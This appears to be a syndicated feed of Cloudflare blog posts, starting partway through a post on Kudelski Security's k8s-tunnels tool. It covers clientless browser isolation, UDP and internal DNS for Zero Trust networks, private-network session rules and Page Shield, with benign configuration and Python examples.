To solve these challenges, our infrastructure engineering team developed an internal tool — called ‘k8s-tunnels’ — that embeds complex configuration steps which make life easier for our developers. Moreover, this tool automatically discovers all the K8s clusters that a given user has access to based on the Zero Trust policies created. To enable this functionality, we embedded the SDKs of some major public cloud providers that Kudelski Security uses. The tool also embeds the cloudflared daemon, meaning that we only need to distribute a single tool to our users.

Altogether, a developer who launches the tool goes through the following workflow (we assume the user already has valid credentials; otherwise, the tool would open a browser to our IdP to obtain them):

1. The user selects one or more clusters to connect to

2. k8s-tunnels automatically opens the connection with Cloudflare and exposes a local SOCKS5 proxy on the developer’s machine

3. k8s-tunnels amends the user’s local Kubernetes client configuration, adding the information needed to go through the local SOCKS5 proxy

4. k8s-tunnels switches the Kubernetes client context to the current connection

5. The user can now use their favorite CLI client to access the K8s cluster
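As a sketch of step 3: kubectl natively supports routing API traffic through a SOCKS5 proxy via the `proxy-url` field in the kubeconfig, so the amended cluster entry might look something like the fragment below. The cluster name, server address, and port are hypothetical placeholders:

```yaml
# Hypothetical kubeconfig cluster entry after k8s-tunnels amends it.
# The local SOCKS5 proxy (e.g. on 127.0.0.1:1080) is the one the tool
# exposes for the tunnel to Cloudflare.
apiVersion: v1
kind: Config
clusters:
  - name: prod-cluster
    cluster:
      server: https://k8s-prod.example.com:6443
      proxy-url: socks5://127.0.0.1:1080   # route API calls through the tunnel
```

With this entry in place, plain `kubectl` (or k9s) commands against `prod-cluster` transparently traverse the identity-aware tunnel.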

The whole process is really straightforward and is being used on a daily basis by our engineering team. And, of course, all this magic is made possible through the auto-discovery mechanism we’ve built into k8s-tunnels. Whenever new engineers join our team, we simply ask them to launch the auto-discovery process and get started.

Here is an example of the auto-discovery process in action.

  1. k8s-tunnels connects to our different cloud providers’ APIs and lists the K8s clusters the user has access to
  2. k8s-tunnels maintains a local config file of those clusters on the user’s machine, so this process does not need to be run more than once

Automation enhancements

For on-premises deployments, it was a bit trickier, as we didn’t have a simple way to store the K8s clusters’ metadata like we do with resource tags at public cloud providers. We decided to use Vault as a key-value store to mimic public cloud resource tags for on-prem. This way, we can achieve auto-discovery of on-prem clusters following the same process as with a public cloud provider.

You may have noticed that the user can select multiple clusters at the same time! We quickly realized that our developers often needed to access multiple environments at once, for example to compare a workload running in production and in staging. So instead of opening and closing tunnels every time they needed to switch clusters, we designed our tool so that they can simply open multiple tunnels in parallel within a single k8s-tunnels instance and just switch the destination K8s cluster on their laptop.

Last but not least, we’ve also added the support for favorites and notifications on new releases, leveraging Cloudflare Workers, but that’s for another blog post.

What’s Next

In designing this tool, we’ve identified a couple of issues inside Kubernetes client libraries when used in conjunction with SOCKS5 proxies, and we’re working with the Kubernetes community to fix those issues, so everybody should benefit from those patches in the near future.

With this blog post, we wanted to highlight how it is possible to apply Zero Trust security for complex workloads running on multi-cloud environments, while simultaneously improving the end user experience.

Although today our ‘k8s-tunnels’ code is too specific to Kudelski Security, our goal is to share what we’ve created back with the Kubernetes community, so that other organizations and Cloudflare customers can benefit from it.

Introducing Clientless Web Isolation

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/introducing-clientless-web-isolation-beta/

Today, we’re excited to announce the beta of Cloudflare’s clientless web isolation: a new on-ramp for Browser Isolation that natively integrates Zero Trust Network Access (ZTNA) with the zero-day, phishing, and data-loss protection benefits of remote browsing, for users on any device browsing any website, internal app, or SaaS application. All without needing to install any software or configure any certificates on the endpoint device.

Secure access for managed and unmanaged devices

In early 2021, Cloudflare announced the general availability of Browser Isolation, a fast and secure remote browser that natively integrates with Cloudflare’s Zero Trust platform. This platform — also known as Cloudflare for Teams — combines secure Internet access with our Secure Web Gateway solution (Gateway) and secure application access with a ZTNA solution (Access).

Typically, admins deploy Browser Isolation by rolling out Cloudflare’s device client on endpoints, so that Cloudflare can serve as a secure DNS and HTTPS Internet proxy. This model protects users and sensitive applications when the administrator manages their team’s devices. And for end users, the experience feels frictionless like a local browser: they are hardly aware that they are actually browsing on a secure machine running in a Cloudflare data center near them.

The end-to-end integration of Browser Isolation with secure Internet access makes it easy for administrators to deploy Browser Isolation across their teams. However, managing endpoint clients can add configuration overhead for users on unmanaged devices, or for contractors on devices managed by third-party organizations.

Cloudflare’s clientless web isolation streamlines connections to remote browsers through a hyperlink (e.g.: https://<your-auth-domain>.cloudflareaccess.com/browser). Once users are authenticated through any of Cloudflare Access’s supported identity providers, the user’s browser uses HTML5 to establish a low-latency connection to a remote browser hosted in a nearby Cloudflare data center without installing any software. There are no servers to manage and scale, or regions to configure.

The simple act of clicking a link in an email or on a website causes your browser to download and execute payloads of active web content, which can exploit unknown zero-day threats and compromise an endpoint.

Cloudflare’s clientless web isolation can be initiated through a prefixed URL (e.g., https://<your-auth-domain>.cloudflareaccess.com/browser/https://www.example.com). Simply configuring your custom block page, email gateway, or ticketing tool to prefix high-risk links with Browser Isolation will automatically send high-risk clicks to a remote browser, protecting the endpoint from any malicious code that may be present on the target link.
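The prefixing itself is plain string concatenation, so any tool that emits links can do it. A minimal sketch (the team auth domain below is a made-up example):

```javascript
// Hypothetical team auth domain; replace with your own.
const AUTH_DOMAIN = 'https://your-team.cloudflareaccess.com';

// Rewrite a high-risk link so it opens in a remote, isolated browser.
function isolate(url) {
  return `${AUTH_DOMAIN}/browser/${url}`;
}

console.log(isolate('https://www.example.com'));
// → https://your-team.cloudflareaccess.com/browser/https://www.example.com
```

A block page or email gateway would apply this rewrite to every outbound link it classifies as high risk.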

Here at Cloudflare, we use Cloudflare’s products to protect Cloudflare, and in fact, use this clientless web isolation approach for our own security investigation activities. By prefixing high risk links with our auth domain, our security team is able to safely investigate potentially malicious websites and phishing sites.

No risky code ever reaches an employee device, and at the end of their investigation, the remote browser is terminated and reset to a known clean state for their next investigation.

Integrated Zero Trust access and remote browsing

The days when corporate data was only accessed from managed devices inside controlled networks have long since passed. Enterprises relying on strict device posture controls to verify that application access only occurs from managed devices have had few tools to support contractor or BYOD workforces. Historically, administrators have worked around the issue by deploying costly, resource-intensive Virtual Desktop Infrastructure (VDI) environments.

Moreover, when it comes to securing application access, Cloudflare Access excels in applying least-privilege, default-deny policies to web-based applications, without needing to install any client software on user devices.

Cloudflare’s clientless web isolation augments ZTNA use cases, allowing applications protected by Access and Gateway to leverage Browser Isolation’s data protection controls such as local printing control, clipboard and file upload / download restrictions to prevent sensitive data from transferring onto unmanaged devices.

Isolated links can easily be added to the Access app launcher as bookmarks allowing your team and contractors to easily access any site with one click.

Finally, just because a remote browser reduces the impact of a compromise, doesn’t mean it should have unmanaged access to the Internet. All traffic from the remote browser to the target website is secured, inspected and logged by Cloudflare’s SWG solution (Gateway) ensuring that known threats are filtered through HTTP policies and anti-virus scanning.

Join the clientless web isolation beta

Clientless web isolation will be available as a capability to Cloudflare for Teams subscribers who have added Browser Isolation to their plan. We’ll be opening Cloudflare’s clientless web isolation for beta access soon. If you’re interested in participating, sign up here to be the first to hear from us.

We’re excited about the secure browsing and application access use cases for our clientless web isolation model. Now, teams of any size, can deliver seamless Zero Trust connectivity to unmanaged devices anywhere in the world.

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

Post Syndicated from Abe Carryl original https://blog.cloudflare.com/extending-cloudflares-zero-trust-platform-to-support-udp-and-internal-dns/

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS


At the end of 2020, Cloudflare empowered organizations to start building a private network on top of our network. Using Cloudflare Tunnel on the server side, and Cloudflare WARP on the client side, the need for a legacy VPN was eliminated. Fast-forward to today, and thousands of organizations have gone on this journey with us — unplugging their legacy VPN concentrators, internal firewalls, and load balancers. They’ve eliminated the need to maintain all this legacy hardware; they’ve dramatically improved speeds for end users; and they’re able to maintain Zero Trust rules organization-wide.

We started with TCP, which is powerful because it enables an important range of use cases. However, to truly replace a VPN, you need to be able to cover UDP, too. Starting today, we’re excited to provide early access to UDP on Cloudflare’s Zero Trust platform. And even better: as a result of supporting UDP, we can offer Internal DNS — so there’s no need to migrate thousands of private hostnames by hand to override DNS rules. You can get started with Cloudflare for Teams for free today by signing up here; and if you’d like to join the waitlist to gain early access to UDP and Internal DNS, please visit here.

The topology of a private network on Cloudflare

Building out a private network has two primary components: the infrastructure side, and the client side.

The infrastructure side of the equation is powered by Cloudflare Tunnel, which simply connects your infrastructure (whether that be a singular application, many applications, or an entire network segment) to Cloudflare. This is made possible by running a simple command-line daemon in your environment to establish multiple secure, outbound-only, load-balanced links to Cloudflare. Simply put, Tunnel is what connects your network to Cloudflare.

On the other side of this equation, we need your end users to be able to easily connect to Cloudflare and, more importantly, your network. This connection is handled by our robust device client, Cloudflare WARP. This client can be rolled out to your entire organization in just a few minutes using your in-house MDM tooling, and it establishes a secure, WireGuard-based connection from your users’ devices to the Cloudflare network.

Extending Cloudflare’s Zero Trust platform to support UDP and Internal DNS

Now that we have your infrastructure and your users connected to Cloudflare, it becomes easy to tag your applications and layer on Zero Trust security controls to verify both identity and device-centric rules for each and every request on your network.

Up until now, though, only TCP was supported.

Extending Cloudflare Zero Trust to support UDP

Over the past year, with more and more users adopting Cloudflare’s Zero Trust platform, we have gathered data surrounding all the use cases that are keeping VPNs plugged in. Of those, the most common need has been blanket support for UDP-based traffic. Modern protocols like QUIC take advantage of UDP’s lightweight architecture — and at Cloudflare, we believe it is part of our mission to advance these new standards to help build a better Internet.

Today, we’re excited to open an official waitlist for those who would like early access to Cloudflare for Teams with UDP support.

What is UDP and why does it matter?

UDP is a vital component of the Internet. Without it, many applications would be rendered woefully inadequate for modern use. Applications that depend on near-real-time communication, such as video streaming or VoIP services, are prime examples of why we need UDP and the role it fills on the Internet. At their core, however, TCP and UDP achieve the same results, just through vastly different means. Each has its own unique benefits and drawbacks, which are always felt downstream by the applications that utilize them.

Here’s a quick metaphor for how they both work: imagine asking somebody a question. TCP should look pretty familiar: you would typically say hi, wait for them to say hi back, ask how they are, wait for their response, and then ask them what you want.

UDP, on the other hand, is the equivalent of just walking up to someone and asking what you want without checking to make sure that they’re listening. With this approach, some of your question may be missed, but that’s fine as long as you get an answer.

Like the conversation above, with UDP many applications actually don’t care if some data gets lost; video streaming or game servers are good examples here. If you were to lose a packet in transit while streaming, you wouldn’t want the entire stream to be interrupted until this packet is received — you’d rather just drop the packet and move on. Another reason application developers may utilize UDP is because they’d prefer to develop their own controls around connection, transmission, and quality control rather than use TCP’s standardized ones.
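As a rough sketch of the difference, the UDP side of the metaphor can be shown with Python’s standard socket module: a datagram can be sent the moment a socket exists, with no handshake and no delivery guarantee. The loopback addresses and message here are purely for illustration.

```python
import socket

# UDP: no handshake. Create a socket, bind it, and datagrams can flow
# immediately. Each sendto() is independent; delivery is not guaranteed.
receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
receiver.bind(("127.0.0.1", 0))  # let the OS pick a free port
receiver.settimeout(2)
addr = receiver.getsockname()

sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender.sendto(b"what time is it?", addr)  # fire and forget: no connect() needed

data, _ = receiver.recvfrom(1024)
print(data)  # b'what time is it?'

# TCP, by contrast, requires connect()/accept() (the handshake) before any
# application data can flow, and every byte is acknowledged and ordered.
sender.close()
receiver.close()
```

On loopback the datagram arrives reliably; over a real network the sender would simply never know if it was dropped.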

For Cloudflare, end-to-end support for UDP-based traffic will unlock a number of new use cases. Here are a few we think you’ll agree are pretty exciting.

Internal DNS Resolvers

Most corporate networks require an internal DNS resolver to provide access to resources made available over their intranet. Your intranet needs an internal DNS resolver for many of the same reasons the Internet needs public DNS resolvers. In short, humans are good at many things, but remembering long strings of numbers (in this case IP addresses) is not one of them. Both public and internal DNS resolvers were designed to solve this problem (and much more) for us.

In the corporate world, it would be needlessly painful to ask internal users to navigate to, say, 192.168.0.1 simply to reach SharePoint or OneDrive. Instead, it’s much easier to create DNS entries for each resource and let your internal resolver handle the mapping, since remembering names is something humans actually are quite good at.

Under the hood, DNS queries generally consist of a single UDP request from the client. The server can then return a single reply to the client. Since DNS requests are not very large, they can often be sent and received in a single packet. This makes support for UDP across our Zero Trust platform a key enabler to pulling the plug on your VPN.
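To make the single-packet point concrete, here is a sketch of a minimal DNS query built by hand with Python’s struct module. The hostname is hypothetical, and real resolvers add extras such as EDNS options, but the entire question comfortably fits one small UDP datagram.

```python
import struct

def build_dns_query(hostname, query_id=0x1234):
    """Build a minimal DNS query (A record, recursion desired) by hand."""
    header = struct.pack(
        ">HHHHHH",
        query_id,  # transaction ID
        0x0100,    # flags: standard query, recursion desired
        1,         # QDCOUNT: one question follows
        0, 0, 0,   # no answer/authority/additional records in a query
    )
    # QNAME: each label is length-prefixed; a zero byte terminates the name
    qname = b"".join(
        bytes([len(label)]) + label.encode() for label in hostname.split(".")
    ) + b"\x00"
    question = qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question

query = build_dns_query("wiki.internal.example.com")
print(len(query))  # 43 bytes: far below the classic 512-byte UDP payload limit
```

The whole request and, typically, its reply each fit in a single packet, which is exactly why DNS defaults to UDP.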

Thick Client Applications

Another common use case for UDP is thick client applications. One benefit of UDP we have discussed so far is that it is a lean protocol. It’s lean because the three-way handshake of TCP and other measures for reliability have been stripped out by design. In many cases, application developers still want these reliability controls, but are intimately familiar with their applications and know these controls could be better handled by tailoring them to their application. These thick client applications often perform critical business functions and must be supported end-to-end to migrate. As an example, legacy versions of Outlook may be implemented through thick clients where most of the operations are performed by the local machine, and only the sync interactions with Exchange servers occur over UDP.

Again, UDP support on our Zero Trust platform now means these types of applications are no reason to remain on your legacy VPN.

And more…

A huge portion of the world’s Internet traffic is transported over UDP. Often, people equate time-sensitive applications with UDP, where occasionally dropping packets would be better than waiting — but there are a number of other use cases, and we’re excited to be able to provide sweeping support.

How can I get started today?

You can already get started building your private network on Cloudflare with our tutorials and guides in our developer documentation. Below is the critical path. And if you’re already a customer, and you’re interested in joining the waitlist for UDP and Internal DNS access, please skip ahead to the end of this post!

Connecting your network to Cloudflare

First, you need to install cloudflared on your network and authenticate it with the command below:

cloudflared tunnel login

Next, you’ll create a tunnel with a user-friendly name to identify your network or environment.

cloudflared tunnel create acme-network

Finally, you’ll want to configure your tunnel with the IP/CIDR range of your private network. By doing this, you’re making the Cloudflare WARP agent aware that any requests to this IP range need to be routed to our new tunnel.

cloudflared tunnel route ip add 192.168.0.1/32

Then, all you need to do is run your tunnel!

Connecting your users to your network

To connect your first user, start by downloading the Cloudflare WARP agent on the device they’ll be connecting from, then follow the steps in our installer.

Next, you’ll visit the Teams Dashboard and define who is allowed to access our network by creating an enrollment policy. This policy can be created under Settings > Devices > Device Enrollment. In the example below, you can see that we’re requiring users to be located in Canada and have an email address ending in @cloudflare.com.

Once you’ve created this policy, you can enroll your first device by clicking the WARP desktop icon on your machine and navigating to preferences > Account > Login with Teams.

Last, we’ll remove the IP range we added to our Tunnel from the Exclude list in Settings > Network > Split Tunnels. This will ensure this traffic is, in fact, routed to Cloudflare and then sent to our private network Tunnel as intended.

In addition to the tutorial above, we also have in-product guides in the Teams Dashboard which go into more detail about each step and provide validation along the way.

To create your first Tunnel, navigate to Access > Tunnels.

To enroll your first device into WARP, navigate to My Team > Devices.

What’s Next

We’re incredibly excited to release our waitlist today and even more excited to launch this feature in the coming weeks. We’re just getting started with private network Tunnels and plan to continue adding more support for Zero Trust access rules for each request to each internal DNS hostname after launch. We’re also working on a number of efforts to measure performance and to ensure we remain the fastest Zero Trust platform, making us a delight for your users compared to the pain of a legacy VPN.

Zero Trust Private Networking Rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/zero-trust-private-networking-rules/

Zero Trust Private Networking Rules


Earlier this year, we announced the ability to build a private network on Cloudflare’s network with identity-driven access controls. We’re excited to share that you will soon be able to extend that control to sessions and login intervals as well.

Private networks failed to adapt

Private networks were the backbone for corporate applications for years. Security teams used them to build a strict security perimeter around applications. In order to access sensitive data, a user had to physically be on the network. This meant they had to be in an office, connecting from a corporately managed device. This was not perfect — network access could be breached over physical connection or Wi-Fi, but tools like certificates and physical firewalls existed to prevent these threats.

These boundaries were challenged as work became increasingly remote. Branch offices, data centers and remote employees all required access to applications, so organizations started relying on Virtual Private Networks (VPNs) to put remote users onto the same network as their applications.

In parallel to the problem of connecting users from everywhere, the security model of a private network became an even more dangerous problem. Once inside a private network, users could access any resource on the network by default unless explicitly prohibited. Identity-based controls and logs were difficult, if not impossible, to implement.

Additionally, private networks come with operational overhead. Private networks are routed using RFC 1918 reserved IP space, which is limited and can lead to overlapping IP addresses and collisions. Administrators also need to consider the total load their private network can withstand, a load that can be further exacerbated by employees on the VPN doing video calls or even watching videos in their off time.
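The overlap problem is easy to demonstrate with Python’s ipaddress module. The two networks below are hypothetical, but both are carved from the same popular RFC 1918 block, which is exactly what happens when, say, two merged companies each used the defaults.

```python
import ipaddress

# Two corporate networks that each started from the common 10.0.0.0/8 defaults
office_a = ipaddress.ip_network("10.0.0.0/16")
office_b = ipaddress.ip_network("10.0.4.0/22")  # carved from the same block

# If both are routed on one VPN, addresses in 10.0.4.x are ambiguous
print(office_a.overlaps(office_b))  # True
```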

Modern alternatives did not solve all use cases

SaaS applications and Zero Trust Networking solutions like Cloudflare Access have made it easier to provide a secure experience without a VPN. Administrators are able to configure controls like multi-factor authentication and logging alerts for anomalous logins for each application. Security controls for public-facing applications have far outpaced applications on private networks.

However, some applications still require a more traditional private network. Use cases that involve thick clients or arbitrary TCP and UDP protocols are still better suited to a connectivity model that lives outside the browser.

We heard from customers who were excited to adopt a Zero Trust model, but still needed to support more classic private network use cases. To solve that, we announced the ability to build a private network on our global network. Administrators could build Zero Trust rules around who could reach certain IPs and destinations. End users connected from the same Cloudflare agent that powered their on-ramp to the rest of the Internet. However, one rule was missing.

Bringing session control to Cloudflare’s private network

Cloudflare’s global network makes this possible and lightning fast. The first step is securely connecting any private networks to Cloudflare. This can be done by establishing secure, outbound-only tunnels using Cloudflare Tunnel, or by adopting a more traditional connection approach like GRE or IPsec tunnels.

Once the tunnel connection is established, specific private IP ranges can be advertised on an instance of Cloudflare. This is done with a set of commands to map a tunnel to a CIDR block of IP addresses. In the screenshot below, CIDR ranges are mapped to unique Cloudflare Tunnels — each with their own unique identifier and assigned name.

Zero Trust Private Networking Rules
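Conceptually, the route lookup behaves like a longest-prefix match over the advertised CIDR ranges. The sketch below illustrates the idea in Python; the route table, tunnel names, and matching logic are illustrative assumptions, not Cloudflare’s implementation.

```python
import ipaddress

# Hypothetical advertised routes: CIDR range -> tunnel name (illustrative only)
ROUTES = {
    ipaddress.ip_network("10.1.0.0/16"): "datacenter-east",
    ipaddress.ip_network("10.1.4.0/24"): "datacenter-east-db",  # more specific
    ipaddress.ip_network("192.168.0.0/24"): "branch-office",
}

def pick_tunnel(destination):
    """Longest-prefix match: route to the most specific advertised CIDR."""
    ip = ipaddress.ip_address(destination)
    matches = [net for net in ROUTES if ip in net]
    if not matches:
        return None  # not a private route; traffic goes to the public Internet
    return ROUTES[max(matches, key=lambda net: net.prefixlen)]

print(pick_tunnel("10.1.4.7"))     # datacenter-east-db
print(pick_tunnel("192.168.0.9"))  # branch-office
```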

Once the applications are addressable over Cloudflare’s network, users need a way to access these private IP ranges. This is where a VPN would traditionally be used to place a user onto the same network as the application. Instead, Cloudflare’s WARP client is used to connect a user’s Internet traffic to Cloudflare’s network.

Administrators then have control over the traffic from a user’s device client. They can create granular, identity-based policies to control which users can access specific applications on certain private IP addresses or, soon, hostnames.

Zero Trust Private Networking Rules

This was a huge step forward for IT and Security teams, as it eliminates painful latency, management and backhauling issues caused by a VPN. However, once a user authenticated, they could keep connecting indefinitely unless access was fully revoked. We know some customers need to force a login every 24 hours, for example, or to set a timeout after one week. We’re excited to give customers the ability to do that.

Launching into beta, administrators can add session rules to the resources made available in this private network model. Administrators will be able to configure specific session durations for their policies and require that a user re-authenticate with multi-factor authentication.
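A session-duration check of this kind boils down to comparing the last authentication time against the configured interval. The names and structure below are an illustrative sketch, not the actual Access implementation.

```python
from datetime import datetime, timedelta, timezone

# Hypothetical policy: force re-authentication every 24 hours
SESSION_DURATION = timedelta(hours=24)

def session_expired(authenticated_at, now=None):
    """Return True once the configured session duration has elapsed."""
    now = now or datetime.now(timezone.utc)
    return now - authenticated_at >= SESSION_DURATION

login = datetime(2021, 12, 1, 9, 0, tzinfo=timezone.utc)
print(session_expired(login, now=login + timedelta(hours=23)))  # False
print(session_expired(login, now=login + timedelta(hours=25)))  # True
```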

What’s next?

This announcement is just one component of making Cloudflare’s Zero Trust private network more powerful for your organization. Also being announced this week is UDP support in this model. Teams will be able to use their existing private DNS nameservers to map their application hostnames on local domains. This prevents issues with clashing or ephemeral private IP addresses for applications.

We’re excited to offer a beta for both of these features. If you would like to try these out before the new year, please use this sign-up link to be alerted when the beta is available.

If you would like to get started with Zero Trust controls for your private network, Cloudflare’s solution is free for the first 50 users. Navigate to dash.teams.cloudflare.com to get started!

Page Shield is generally available

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/page-shield-generally-available/

Page Shield is generally available


Supply chain attacks are a growing concern for CIOs and security professionals.

During a supply chain attack, an attacker compromises a third-party tool or library that is being used by the target application. This normally results in the attacker gaining privileged access to the application’s environment, allowing them to steal private data or perform subsequent attacks. For example, Magecart is a very common type of supply chain attack, whereby the attacker skims credit card data from e-commerce site checkout forms by compromising third-party libraries used by the site.

To help identify and mitigate supply chain attacks in the context of web applications, today we are launching Page Shield in General Availability (GA).

With Page Shield you gain visibility into which scripts are running on your application and can be notified when they have been compromised or are showing malicious behaviour, such as attempting to exfiltrate user data.

We’ve worked hard to make Page Shield easy to use: you can find it under the Firewall tab and turn it on with one simple click. No additional configuration required. Alerts can be set up separately on an array of different events.

Page Shield is generally available

What is Page Shield?

Back in March of this year, we announced early access to Page Shield, our solution to protect end user data from exploits targeting the browser.

Earlier today, we announced our acquisition of Zaraz, a tool built on Workers that allows customers to easily load third-party tools in the cloud, instead of loading their JavaScript code in the browser, directly from the Cloudflare UI, with immediate performance and security benefits. But not all applications use, or wish to use, a third-party manager. Nonetheless, we have you covered.

Page Shield leverages our position in the network as a reverse proxy to receive information directly from the browser about which JavaScript files and modules are being loaded. We then provide visibility, analyse the files, and warn you whenever a JavaScript file shows malicious behaviour.

Examples of compromised JavaScript files include Magecart attacks, cryptomining, and adware. With the ever-growing popularity of SaaS-based applications and services, it is very rare to find an application that does not leverage or load JavaScript code directly from third parties out of the application owner’s control, making detecting and mitigating compromised files even harder.

How hard is client-side security?

Early indications from Page Shield suggest that, on average, any given application loads scripts from eight third-party hosts. These hosts range from large enterprises such as Google to smaller companies that provide “plug and play” modules that quickly enhance web application functionality (think chat systems, date pickers, checkout platforms, etc.). Each one of these third parties can be a target for a potential supply chain attack, making the attack surface very large and difficult to monitor.

To make matters worse, things change fast. On average, about 50% of applications load scripts from new third-party hosts every month. This indicates that the attack surface is not only large, but also changing rapidly.

How does Page Shield work?

As with any security product, we can think of Page Shield as providing visibility, detection, mitigation, and prevention. The first step is visibility.

Visibility

When turned on, the current iteration of Page Shield uses a content security policy (CSP) deployed with a report-only directive to collect information from the browser. This allows us to provide you with a list of all scripts running on your application.

In HTTP terms, this is an HTTP response header added to a sample of page responses from the origin server back to the browser. The CSP header looks like this:

content-security-policy-report-only: script-src 'none'; report-uri /cdn-cgi/script_monitor/report

The above header instructs the browser that no scripts should be loaded (script-src 'none') and that any violation should be reported to the endpoint provided (report-uri /cdn-cgi/script_monitor/report). Also note that the violation report endpoint resolves to the Cloudflare network, where it is processed, so no additional traffic reaches the origin server.
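A reverse proxy injecting this header into a sampled fraction of HTML responses might look roughly like the following sketch. The header name and value mirror the ones above, but the sampling logic is an assumption for illustration, not Cloudflare’s actual implementation.

```python
import random

CSP_VALUE = "script-src 'none'; report-uri /cdn-cgi/script_monitor/report"

def maybe_add_csp(response_headers, sample_rate=0.01, rng=random.random):
    """Attach the report-only CSP to a sampled fraction of HTML responses."""
    is_html = response_headers.get("content-type", "").startswith("text/html")
    if is_html and rng() < sample_rate:
        response_headers["content-security-policy-report-only"] = CSP_VALUE
    return response_headers

# With sample_rate=1.0, every HTML response gets the header
headers = maybe_add_csp({"content-type": "text/html; charset=utf-8"}, sample_rate=1.0)
print(headers["content-security-policy-report-only"])
```

Because the directive is report-only, browsers keep loading scripts normally; they just phone home about each one.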

Each violation report sent by the browser, implemented as an HTTP POST request, provides us with information on the script. Here is an example:

{
   "csp-report":{
      "document-uri":"https://www.example.com/",
      "referrer":"",
      "violated-directive":"script-src-elem",
      "effective-directive":"script-src-elem",
      "original-policy":"script-src 'none'; report-uri /cdn-cgi/script_monitor/report",
      "Disposition":"report",
      "blocked-uri":"https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js",
      "status-code":200,
      "script-sample":""
   }
}

This report tells us:

  • The page the script was loaded from (document-uri)
  • The referrer, if applicable
  • Which CSP directive was violated
  • The full CSP that contains the directive
  • The full link to the JavaScript file
  • The response code the browser received when loading the file. In the example above, the response code is 200, which indicates that the file was loaded successfully.

By collating all the information provided in the reports and enhancing it with additional data, we are able to provide detailed information on every script being loaded by your application, both via the Cloudflare UI and API.
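Collating the reports into a per-script view can be sketched in a few lines. The report fields follow the example above, while the aggregation itself is purely illustrative.

```python
import json
from collections import defaultdict
from urllib.parse import urlparse

# One raw report shaped like the example above, truncated to relevant fields
raw_reports = [
    '{"csp-report": {'
    '"document-uri": "https://www.example.com/", '
    '"blocked-uri": "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js", '
    '"status-code": 200}}',
]

pages_by_script = defaultdict(set)  # script URL -> pages it was observed on
for raw in raw_reports:
    report = json.loads(raw)["csp-report"]
    pages_by_script[report["blocked-uri"]].add(report["document-uri"])

for script_url, pages in pages_by_script.items():
    print(urlparse(script_url).hostname, "serves a script seen on", len(pages), "page(s)")
```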

All Cloudflare Pro zones have access to our Page Shield script reports. Additionally, Business and Enterprise zones have access to page attribution information, allowing you to quickly identify where a script is being loaded from within your application. Business and Enterprise zones can also set up alerts on a number of script change events.

Detection

Application owners might be leveraging content security policies already to ensure only specific scripts are loaded. However, CSPs often tend to be too liberal, and browsers provide no native mechanism to detect when JavaScript files show malicious behaviour, even in code that a content security policy allows to load, which greatly reduces their effectiveness.

With Page Shield we believe we have a real opportunity to help our customers with malicious behaviour detection.

For any JavaScript file found in your zone by the system, we will perform a number of actions aimed at detecting malicious behaviour:

  1. Any JavaScript file loaded from a hostname categorised as malicious in our threat feeds will be flagged appropriately. This includes parent domains.
  2. Similarly, if specific URLs are categorised as malicious in our feeds, these will also be flagged. In this latter case, given the exact file has been categorized as malicious, an attack is likely ongoing.
  3. Finally, we will download the file and run it through our classifier. The classifier performs deobfuscation, normalisation and decoding steps before looking for correlations between form field fetches and data exfiltration calls. The stronger the correlation the more likely the script is performing a Magecart type attack. We will post additional technical details about our technology in follow-up posts — stay tuned!
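A drastically simplified version of the correlation idea in step 3 might look like the toy heuristic below. The patterns, field names, and sample scripts are illustrative only; the real classifier also deobfuscates and normalises code first, which this sketch does not.

```python
import re

# Toy signals: reads of payment-looking form fields, and outbound calls
FIELD_READ = re.compile(r"""document\.getElementById\(['"](card|cvv|cc_)""")
EXFIL_CALL = re.compile(r"""(fetch|XMLHttpRequest|navigator\.sendBeacon)""")

def looks_like_skimmer(source):
    """Flag scripts that both read sensitive fields and send data out."""
    return bool(FIELD_READ.search(source) and EXFIL_CALL.search(source))

benign = "document.getElementById('menu').classList.toggle('open');"
suspicious = (
    "var n = document.getElementById('card_number').value;"
    "fetch('https://evil.example/c?d=' + btoa(n));"
)
print(looks_like_skimmer(benign))      # False
print(looks_like_skimmer(suspicious))  # True
```

A production classifier weighs many more signals and their proximity; co-occurrence alone, as here, would produce false positives on legitimate checkout code.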

Our Enterprise customers can purchase the full set of Page Shield capabilities, including the detection capabilities. Please contact your account manager.

As we build the product further through next year, we plan to add additional detection signals as well as improve upon our classifier and detect additional attack types, including adware, ransomware and crypto mining.

Once a malicious signal triggers on a JavaScript file, Cloudflare can notify you via an alert that can be set up via email, webhook, PagerDuty, and other channels.

Prevention and mitigation

Many of our larger customers have content security policies already, and although it is easy to add an HTTP response header that implements a CSP via Cloudflare, we can do better.

Although not included in this immediate release, we are already hard at work to bring both prevention and mitigation options to Page Shield:

  • Prevention by allowing easy CSP generation based on observed active scripts, allowing for editing and redeploying of policies as required either via the dashboard or directly via API as part of a deployment pipeline.
  • Blocking by leveraging our proxy to allow for malicious scripts to be removed inline from HTTP response bodies.
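Generating a starting policy from observed scripts could be as simple as the following sketch. The hostnames are illustrative, and a real policy would be reviewed and tightened before deployment.

```python
from urllib.parse import urlparse

# Script URLs as they might be observed by Page Shield (illustrative)
observed_scripts = [
    "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js",
    "https://www.google-analytics.com/analytics.js",
    "https://www.example.com/static/app.js",
]

# Allow-list the distinct hosts, plus the site's own origin via 'self'
hosts = sorted({urlparse(url).hostname for url in observed_scripts})
policy = "script-src 'self' " + " ".join(hosts)
print(policy)
```

Deployed in enforcing mode (content-security-policy rather than the report-only variant), such a header would block any script host that later appears unexpectedly.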

Get started

If you already have a website on Cloudflare, upgrade to any of our paid plans to start leveraging Page Shield features today without any additional configuration required. You can also use our API to leverage Page Shield features.

If you do not have a website on Cloudflare, signing up only takes 5 minutes!

Zaraz use Workers to make third-party tools secure and fast

Post Syndicated from Yo'av Moshe original https://blog.cloudflare.com/zaraz-use-workers-to-make-third-party-tools-secure-and-fast/

Zaraz use Workers to make third-party tools secure and fast


